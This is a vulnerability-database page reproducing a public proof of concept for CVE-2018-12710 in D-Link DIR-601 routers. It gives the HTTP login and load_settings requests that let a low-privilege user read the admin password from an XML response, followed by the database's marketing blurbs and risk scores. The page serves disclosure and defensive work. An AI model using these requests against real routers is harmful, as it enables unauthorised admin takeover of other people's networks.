Vulners
Lucene search
DLink DIR-601 - Credential Disclosure
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | DLink DIR-601 - Credential Disclosure Vulnerability | 30 Aug 201800:00 | – | zdt |
 | D-Link DIR-601 Elevation of Privilege Vulnerability | 30 Aug 201800:00 | – | cnvd |
 | CVE-2018-12710 | 29 Aug 201819:00 | – | cve |
 | CVE-2018-12710 | 29 Aug 201819:00 | – | cvelist |
 | DLink DIR-601 - Credential Disclosure | 30 Aug 201800:00 | – | exploitpack |
 | CVE-2018-12710 | 29 Aug 201819:29 | – | nvd |
 | Default credentials | 29 Aug 201819:29 | – | prion |
 | PT-2018-3889 · D Link · D-Link Dir-601 | 17 Aug 201800:00 | – | ptsecurity |
# Exploit Title: DLink DIR-601 - Credential Disclosure
# Google Dork: N/A
# Date: 2018-06-24
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.dlink.com
# Software Link: N/A
# Version: Firmware: 2.02NA Hardware Version B1
# Tested on: Windows 10 + Mozilla Firefox
# CVE : CVE-2018-12710
# 1. Description
# Being local to the network and having only "User" account (which is a low privilege account)
# access, an attacker can intercept the response from a POST request to obtain "Admin"
# rights due to the admin password being displayed in XML.
# 2. Proof of Concept
# Tools to use:
# - BurpSuite
# - Browser of your choice
# 3: Login with "User" role account:
*My "User" role account does not have a password in this example*
POST /my_cgi.cgi?0.4008728147399542 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-AU,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/login_real.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
DNT: 1
Connection: close
request=login&user_user_name=dXNlcg==&user_user_pwd=&user_type=1
# 4: When logged into the access point, click on the Tools option
# 5: You should see a request similar to the following:
POST /my_cgi.cgi?0.9277791631615954 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-AU,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/tools_admin.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 277
DNT: 1
Connection: close
request=load_settings&table_name=admin_user&table_name=user_user&table_name=graph_auth&table_name=remote_management&table_name=system&table_name=virtual_server&table_name=port_forwarding&table_name=application_rules&table_name=inbound_filter&table_name=fw_ver&table_name=hw_ver
# 6: Right click on this request and choose "Do Intercept response from this request"
# 7: You will see a response similar to the following:
HTTP/1.1 200 OK
Content-type: text/xml
Connection: close
Date: Sat, 01 Jan 2011 00:19:56 GMT
Server: lighttpd/1.4.28
Content-Length: 20088
<?xml version="1.0" encoding="UTF-8"?><root><login_level>0</login_level><admin_user><admin_user_name>admin</admin_user_name>
<admin_user_pwd>testagain</admin_user_pwd><admin_level>1</admin_level></admin_user><user_user><user_user_name>user</user_user_name>
<user_user_pwd></user_user_pwd><user_level>0 ...Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Aug 2018 00:00Current
7High risk
Vulners AI Score7
CVSS 22.7
CVSS 38
EPSS0.58466